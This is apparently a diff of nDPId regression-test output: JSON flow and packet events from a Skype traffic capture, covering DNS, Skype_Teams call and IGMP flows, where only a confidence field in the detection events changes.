{"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431970670304,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970670304,"pkt":"0NQSxnP1PBXCt3IOCABFAABLI7cAAEAR03fAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1431970670460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970670460,"pkt":"0NQSxnP1PBXCt3IOCABFAABAdiAAAEARgRnAqAEiwKgBAfduADUALM6fTeoBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1431970670460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970670460,"pkt":"0NQSxnP1PBXCt3IOCABFAABAmMcAAEARXnLAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431970670941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970670941,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyyNoAAEARNhPAqAEib91KJjLdnE8AHkdoe4ECIl4YB+sv8264lsMD2bF6lk0ImA=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1431970670941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970670941,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyjX8AAEARWhHAqAEinTg0KDLdnFEAHlwwe4MCZJjbDEMF5Jp3fN4mrZ11ZfLW0g=="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLhJoAAEARcpTAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLdIYAAEARgqjAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABArq9AAEAGEE\/AqAEib91KEshDnFkB\/oZbAAAAALAC\/\/94TQAAAgQFtAEDAwUBAQgKPjIXzQAAAAAEAgAA"} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmb4AAEARx3TAqAEiQAQXqzLdnF8ALTBge4UCLJNHDZxrWqKO2le\/27Ln4ZxRCYpxEOdXlle+BhpaiN\/trw=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1BfQAAEAR+PHAqAEib91KKzLdnEEAIUqfe4cCc5jQ2kkfJiYMRWMm+FrbQ2W3s3qD9w=="} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IIEAAEAReCLAqAEiQTffFDLdnFcAIOS9e4kCJNSTA+Y3HirwjN7M3H9IWhw2zkeB"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431970672329,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431970672329,"pkt":"AQBeWbwBJKQ8\/kzXCABGwAAgAABAAAECfDnAqAHb6Vm8AZQEAAAWAESk6Vm8AQAAAAAAAAAAAAAAAAAA"} -00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1431970672330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970672330,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIpxZyEOVl6lyAf6GXKASOJAXYAAAAgQFrAQCCApNdqzUPjIXzQEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1431970672330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970672330,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GgdAAEAGpQPAqAEib91KEshDnFkB\/oZclZepc4AQECxtDwAAAQEICj4yGUhNdqzU"} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqkkAAEARTOXAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLc8IAAEARg2zAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1431970672959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970672959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1S7cAAEARFafAqAEiQAQXjDLdnEMAIfDFe4sC3LQi2HlVtL\/yF355PoVbgc9yifdOBA=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431970672959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970672959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+TFEAAEARFPLAqAEiQAQXnjLdnFUAKkRXe40CBN0haY4HfyNbFaIJe0md26M72eisE+NIO7kZgnvi7w=="} 